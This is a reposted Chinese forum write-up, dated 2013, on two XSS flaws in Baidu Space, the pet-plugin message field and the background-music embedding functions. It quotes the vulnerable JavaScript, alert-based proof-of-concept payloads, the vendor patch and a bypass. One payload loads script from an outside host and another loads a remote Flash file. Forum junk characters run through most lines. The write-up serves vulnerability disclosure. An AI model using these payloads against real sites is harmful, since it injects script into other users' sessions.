百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
- U% l5 _3 U& z2 O+ J5 ^3 s9 S/ f f3 D3 ^: S1 g/ s+ E' f
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
3 V/ `* Q/ I, x, g- D( J8 y2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 . X8 f2 a5 m; b3 |7 y, z
1 B4 I* `/ z4 E" [5 X
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
: r" j }) D y& T1 i其中BdUtil.insertWBR为
$ W5 r `9 T* A5 d F" f& X; {6 g: Lfunction(text, step) {
8 j% a; w4 k, Q% u# T/ h- f var textarea = textAreaCache || getContainer(); - I: p1 p2 ?2 N' T- j3 T% b1 q
if (!textarea) { / t( W! G( ^ C. o- r# j
return text;
0 d* G% D7 o% x/ C: a4 E } 2 m: b* x# d8 w4 R, C; r; k/ K
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); & ~! ~4 H4 Z6 M% c2 W9 b" E1 @ N2 V
var string = textarea.value; * Q- t' n" A+ U5 w* `+ e
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
0 ?+ {! E( W! F g6 v3 w c! b var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); / }: k4 i7 g4 t7 ^
return result; ) r' G9 C( l' b7 j
}
4 C8 t( k- y* F# m" J在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. # g+ r& M5 J- I) u0 C' @" [/ j
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
% P8 l7 S* b$ P; j
# `# t1 z U) l二:creatbgmusic() Dom-Xss Bug 3 t- P, m5 w7 Z' m; i2 I
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 ' D( G. \) @ E( h& x( J5 G- @
8 M& }6 d/ _! S. ~& V在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
1 A- R6 z$ V0 ]' i/ r, C& h2 w% I
1 c! Q+ l7 F8 ^5 Jfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
. b, ]; I7 c" V) m //传入的murl赋值到bgmusic1和bgmusic2中 % O* ]3 F9 j, u. s; F# V* N7 T
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 / c- M9 U' n9 d* j5 V) r, W
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
: h% `6 @1 \' e if (musicnum <= 1) { # q, @: o" O6 @/ ]. P# f
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; 4 O! C& h- C/ \. P; N
}
; Z# _( u& c, V7 H' e bgmusic1 += "</OBJECT>";
4 Z6 B$ s9 Y/ i& N) ]' m var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
" W S8 F4 t+ o* K if (musicnum <= 1) {
' H' B6 V! z, W% o! ] bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; % W3 M9 K7 B9 G
} / B# s O0 K9 p0 @, ]
bgmusic2 += "> </EMBED>";
" d: P: d) x. y$ z var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; . B6 g' o4 s- U& U4 |
var bgmus = detectWMP(); % D3 L8 t! K% O) y1 G! H
if (functype == "FckMusicHelper") {
3 R+ `) w( Y$ p: u7 U, u* {4 f if (bgmus.installed) {
9 N1 I( h( i9 \7 Z if (bgmus.type == "IE") { 5 J8 J' M9 R% p! h) o" E
return bgmusic1; / S! Z1 h8 k0 R) |/ Z# E
} else if (bgmus.type == "NS") {
, F$ r! x4 A2 n8 r! ~ return bgmusic2;
& l& \5 \ h, o/ v. J }
# R) c; y( Z$ a' C, z- R } else { 3 S* T$ `7 j. `- a7 L! J
return bgmusic3;
, C: B: j6 g h) ]$ E } ' W+ L( V; {+ @' u1 q
} else { d9 L9 m- p9 I" @
if (bgmus.installed) {
G2 C' e% v3 h: L. M //document.write 直接输出bgmusic变量 导致xss ( [" W# e. o2 P
if (bgmus.type == "IE") { ) |! ]. v7 j. }' B( |0 `
document.write(bgmusic1); 8 D! M. ?& v' k* U% i% @
} else if (bgmus.type == "NS") { " ^+ \0 A) q2 b- b) Y
document.write(bgmusic2); ' L+ T O' ~7 p/ @: m
} . }5 c7 A! J+ i# g& y
} else {
d. b4 i' p$ I0 Q8 X0 F# H9 B' U document.write(bgmusic3); - {* y) y+ H9 ]# x* ^7 `# _
} 8 Q) z" h* }# L, _
return "";
' d5 `2 q$ B+ }- k }
* p X+ F% C! W8 U4 @3 I8 Q. r4 |8 T}
6 Y. @7 J( B9 `$ j3 X. v; l2 ~- c% k1 T4 M& f
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
' [3 U: A. h8 R7 `: H! w; }4 _! t$ H* }/ l
function initBlogTextForFCK(){
$ I; }, {4 g! K7 e" C9 t//fck init music ) F- N; I( {4 k* D S/ e
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
- Z% x! s b) U" Z$ E8 U/ Evar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
5 [8 E5 N1 {: R0 G6 |var isAutoPlay=true; ) S! m6 j N" v1 Q
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. 4 N% l: P- n; }: ?5 G
var img=imgBox; 9 P3 z( I) d7 k' B/ p! r9 k
if(img.getAttribute(’rel’)){
8 k& m! k1 H7 d( t! ^ var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
, l/ S+ |- S: n9 M/ p var musicDiv = document.createElement("SPAN"); ( y% f1 @3 T* L( @1 D
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
& g4 w/ j. r# w1 f7 a 1 Q7 i6 v+ N8 w! Q! i, e- C
.......................... , [7 S9 G* t7 i
: r! H6 Y6 b8 X0 C! U/ |/ I //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. # p" Z: `4 u! x! `
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
9 N: d( D5 S5 f% h# ]1 c ` shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
+ p) S7 d/ w. P- y+ j" j( J1 b# d musicDiv.innerHTML=shtml;
7 r0 p" b* i6 \5 C/ ^3 | i--;n--; - h0 T# e7 N9 @2 {
} . l; M2 M; g- t4 v$ r J( Y; m
} ( X/ |, ^8 g, k/ L* F" F2 N
% \6 K# u n2 G! ? L
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
+ U, n8 o# `( ]. G4 |( Q. c : ]0 }+ g# P2 n, M; A9 Y
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> 1 h# N1 `) P: |) u
4 P" f" N0 p6 |! v* @0 |7 ]等待官方补丁
- Z* C$ B0 r7 i
' g! A2 Q& z1 X$ {4 |! S4 S6 wupdate 2010年5月13日 ! ]- g7 p# y" R+ N* B
; K ~* g/ C# G% P# u( B# Z. n
官方补丁:
8 I0 L$ V$ m, |8 b
9 G J6 k4 t9 x( n+ M4 u9 {" mvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 6 a' ]1 x6 I2 \0 k+ v! T
改为:
: q2 x+ ]& g5 U- ?var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
3 w/ ?: R6 p, L. m+ [3 ^/ I9 R6 a: Z9 k9 k
update 2010年5月13日 21:50:37 0 j; |* d4 u9 } q
1 b# N: ^& y$ n% _6 f; g# e8 O" _
补丁存在漏洞 没有过滤" 可以继续跨: " V+ @* @: O# \8 ~
r2 x5 s8 O3 K* M9 ^; i
NEW POC:
% v g# s/ [ l0 E! Z% s7 h
2 ~+ K$ r* g7 e/ Q+ F n+ }<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" . B0 E* C, u; r" D, U$ y% c& X
, l5 e, m6 z8 {% ]( rallowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>5 p) M; p8 R ^! |6 X" i
' d5 S7 W) B# r6 G% D* h
|
发表于 2013-8-24 11:51:11
收藏
支持
反对